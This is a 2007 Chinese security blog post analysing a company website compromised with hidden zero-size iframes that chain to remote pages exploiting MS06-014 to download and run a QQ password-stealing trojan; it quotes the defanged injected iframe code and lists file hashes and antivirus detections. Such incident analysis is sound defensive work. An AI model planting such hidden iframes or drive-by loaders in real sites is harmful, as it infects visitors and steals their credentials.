广西某邦农业股份有限公司网站被挂马Trojan.PSW.Win32.QQPass.qpr

最新推荐文章于 2024-07-12 10:43:17 发布
最新推荐文章于 2024-07-12 10:43:17 发布
阅读量2k 收藏
点赞数
分类专栏: 系统安全 文章标签: 农业 iframe vbscript javascript url google
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/1869330
版权

广西某邦农业股份有限公司网站被挂马Trojan-PSW.Win32.QQPass.ahe / Trojan.PSW.Win32.QQPass.qpr

endurer 原创
2007-11-06 第1

打开该公司网站时,Kaspersky 报告:
/---
已检测到: 木马程序 Trojan-Downloader.VBS.Small.ca URL: hxxp://user**.free***2.7*71*69.net/ayayxi/hz2.htm
已检测到: 恶意程序 Exploit.JS.ADODB.Stream.y URL: hxxp://user**.free***2.7*71*69.net/ayayxi/hz3.htm
已检测到: 木马程序 Trojan-Downloader.VBS.Small.dc URL: hxxp://user**.free***2.7*71*69.net/ayayxi/hz4.htm
---/

检查网页代码,发现:
/---
<iframe src="hxxp://user**.free***2.7*71*69.net/ayayxi/jxy.htm" width="0" height="0" frameborder="0"></iframe>
---/

hxxp://user**.free***2.7*71*69.net/ayayxi/jxy.htm 包含代码:
/---
<iframe src="hxxp://user**.free***2.7*71*69.net/ayayxi/hz.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://user**.free***2.7*71*69.net/ayayxi/hz1.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://user**.free***2.7*71*69.net/ayayxi/hz2.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://user**.free***2.7*71*69.net/ayayxi/hz3.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://user**.free***2.7*71*69.net/ayayxi/hz4.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://user**.free***2.7*71*69.net/ayayxi/z/hz5.htm" width="0" height="0" frameborder="0"></iframe>
---/

hxxp://user**.free***2.7*71*69.net/ayayxi/hz.htm 未能打开。

hxxp://user**.free***2.7*71*69.net/ayayxi/hz1.htm 包含JavaScript代码,功能是利用MS06-014: msadco.dll 严重漏洞 下载 ke.exe,保存为 C:/boot.exe 并运行。

文件说明符 : D:/test/ke.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-11-6 13:36:44
修改时间 : 2007-11-6 13:37:16
访问时间 : 2007-11-6 13:38:15
大小 : 47203 字节 46.99 KB
MD5 : 6e53bf373366486950315e9462dee47a
SHA1: 2B14B97FCA6BC3CA41CB477E9ABB92D7465E66F4
CRC32: 85f05bbe

Kaspersky 已检测到: 木马程序 Trojan-PSW.Win32.QQPass.ahe 文件: D:/test/ke.exe/NSPack

瑞星报为: Trojan.PSW.Win32.QQPass.qpr


hxxp://user**.free***2.7*71*69.net/ayayxi/hz2.htm
hxxp://user**.free***2.7*71*69.net/ayayxi/hz3.htm
hxxp://user**.free***2.7*71*69.net/ayayxi/hz4.htm
均包含 VBScript 代码,功能是利用MS06-014: msadco.dll 严重漏洞 下载 ke.exe 到临时文件夹中, 文件名为 svchost.exe 并运行。

hxxp://user**.free***2.7*71*69.net/ayayxi/hz5.htm 未能打开。

Google已将该网站标志为:该网站可能含有恶意软件,有可能会危害您的电脑。

紫郢剑侠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2020年trojan最新windows64客户端trojan-1.15.1-win.zip
04-14
2020年trojan最新windows64客户端
trojan-1.16.0-win.zip
04-01
trojan
一个利用real,联众游戏程序漏洞,MS06-014传播机器狗/fa.exe的网站
caobihole
02-13 175
一个利用real,联众游戏程序漏洞,MS06-014传播机器狗/fa.exe的网站 endurer 原创2008-02-13 第1版 一位网友反映说他所管理的网站出了问题,打开任一网页,杀毒软件就报病毒。 检查该网站的网代码,发现:/---<iframe src=hxxp://xxx.hu*i**la**ib*a*.info/104.htm width=100 height=0></ifra...
logogo.exe威金变种病毒
weixin_34143774的博客
09-08 220
前段时间公司电脑中了logogo.exe这个病毒,在网上搜索一下,得知是8.31号新出来的病毒,还没有任何有效的专杀,看来只能手动杀了。 先用360扫描,扫描出一些***包括wlhpri.dll,qhbpri.dll等等***,这些***在system32目录下面也能找到,但是用360杀不掉。 本来因为比较懒,所以不想到安全模式下删了,...
某国菜网利用N个漏洞RootKit.Win32.RESSDT.dr等
Purpleendurer@CSDN
09-05 2813
某国菜网利用N个漏洞RootKit.Win32.RESSDT.dr等该网网页包含代码:/---<iframe. src=hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/1.htm width=1 height=0></iframe>---/#1 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/1.htm 包含代码:/---<i
小心冒充瑞星专家的病毒ravexp.exe
Purpleendurer@CSDN
01-17 1556
endurer 原创2007-01-17 第1版打开URL:/------hxxp://www.%6E%6A***%74%73%69***%73.com/images/ravexpert.jpg------/你会看到一张图片,其实这个URL指向的是一个网页,包含代码:/------<IFRAME align=center name="target" frameBorder=0 he
遭遇Win32.Loader.c,Trojan.PSW.Win32.GameOnline,Trojan.PSW.Win32.AskTao等1
caobihole
11-22 592
遭遇Win32.Loader.c,Trojan.PSW.Win32.GameOnline,Trojan.PSW.Win32.AskTao等1 endurer 原创2007-11-22 第1版 昨天中午,一位网友说他的电脑双击打不开磁盘,运行程序时防火墙就询问是否允许该程序访问网络,让偶帮忙检查。 下载 pe_xscan 扫描 log 并分析,发现如下可疑项(进程模块部分有省略):/=== ...
osx.raedbot.rar_At Risk_OSX.Raedb_linux trojan_realbasic_xraed
09-21
描述中提到的“Cross-Platform worm-trojan (Win32 , Linux and Mac OS ) source in REALBasic”进一步确认了这是一个跨平台的蠕虫木源代码,是用REALBasic编程语言编写的。REALBasic是一种基于Basic的集成开发...
js.scob.trojan.nasl
11-08
js.scob.trojan
XEN V1.0.7 [CyberNation]_rat_V|XEN.com_
09-29
"rat"通常在网络安全领域指的是"远程访问木"(Remote Access Trojan),这是一种恶意软件,允许攻击者未经授权地控制受感染的计算机。"V|XEN.com"可能是该恶意软件的变种标识或者是相关资源的网址。 描述中的...
遭遇Windows Update.exe/Trojan.Win32.Autoit.fc,情se发布器.exe/AdWare.Win32.Undef.eko
Purpleendurer@CSDN
05-19 4601
遭遇Windows Update.exe/Trojan.Win32.Autoit.fc,情se发布器.exe/AdWare.Win32.Undef.eko endurer 原创2009-05-19 第1版 一位朋友的电脑最近出现了奇怪的毛病,请偶帮忙检修。打开电脑进入Windows桌面后,感觉电脑很卡,除了超级巡警窗口,打开其它窗口都像是不停地自动在进行前台程序和后台程序的切换
某县农业网被植入利用暴风影音2缓冲区溢出等漏洞的恶意代码
Purpleendurer@CSDN
09-25 1978
某县农业网被植入利用暴风影音2缓冲区溢出等漏洞的恶意代码endurer 原创2007-09-25 第1版在 Maxthon 中打开该网站,Maxthon 会假死几分钟。检查网页源文件,发现尾部被加入代码:/---<script language=javascript src=hxxp://www.l*u**oyun**.com.cn/ly4/UploadAdpic/main.js></sc
vue2 实现原生 WebSocket
weixin_38797742的博客
07-11 270
原生WebSocket: new WebSocket。
Webkit简介以及工作流程
读心悦
07-10 320
WebKit是一个开源的浏览器引擎,最初由苹果公司基于KHTML(K Desktop Environment的HTML渲染引擎)开发,并广泛应用于Safari浏览器。随着时间的推移,WebKit也被其他多款浏览器和应用所采用,成为Web技术生态中的重要一员。WebKit的核心功能包括解析HTML、CSS、JavaScript等网页内容,并将其渲染为可视化的网页页面。它主要由WebCore(负责HTML解析、CSS样式计算和布局)和JavaScriptCore(负责JavaScript解释执行)两大部分组成。
vue引入sm-crypto通过sm4对文件进行加解密,用户输入密码
cc1314_工作、学习有感
07-12 256
通过sm4对文件进行加解密,用户输入密码
vue2 、 vue3首屏优化,减少白屏时间
m0_56104994的博客
07-09 311
vue2、vue3首屏优化,减少白屏时间
前端 JS 经典:迭代器
weixin_64684095的博客
07-12 196
如果在最后一个值返回后再调用 next()方法,那么返回的对象中属性 done 的值为 true,属性 value 则包含迭代器最终返回的值(如果没有相关数据则返回 undefined)。可迭代对象具有 Symbol.iterator 属性,通过指定的函数可以返回一个作用于附属对象的迭代器。JavaScript 中有一些内置的可迭代对象,如数组、字符串、集合(Set)、映射(Map)等,它们都具有默认的迭代器。在 JavaScript 中,迭代器是一个对象,它定义了一个序列,并在终止时可能返回一个返回值。
javascript高级部分笔记
喵喵的博客
07-09 1279
javascript高级部分 Function方法 与 函数式编程 call 语法:call([thisObj[,arg1[, arg2[, [,.argN]]]]]) 定义:调用一个对象的一个方法,以另一个对象替换当前对象。 说明:call 方法可以用来代替另一个对象调用一个方法。call 方法可将一个函数的对象上下文从初始的上下文改变为由 thisObj 指定的新对象。 如果没有提供 thisObj 参数,那么 Global 对象被用作 thisObj。 let myName = 'goudan
Vue3 使用 Vue Router 时,prams 传参失效和报错问题
最新发布
专注基础架构领域
07-12 441
我尝试使用 prams 传递数据当我跳转页面时,得到的 prams 数据为空 ,控制台也出现了 Vue Router 的警告点开链接后发现了原因,。也就是说,从Vue Router的2022-8-22 这次更新后,我们使用上面的方式在新页面无法获取:vue也给我们提出了解决方案:使用 query 的方式传参只要改成query 传参就好了,注意query传参只能用路由表中的 path ,不是 name ,并且所有参数都会显示在URL 地址上。将参数放在 pinia 或 vuex仓库里。
Trojan-Downloader.Win32.Agent.bbb 木手动查杀
06-09
首先,关闭所有正在运行的程序,然后按照以下步骤手动查杀Trojan-Downloader.Win32.Agent.bbb木: ...6. 最后,重启电脑,确保所有更改生效并且Trojan-Downloader.Win32.Agent.bbb木已经被完全清除。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值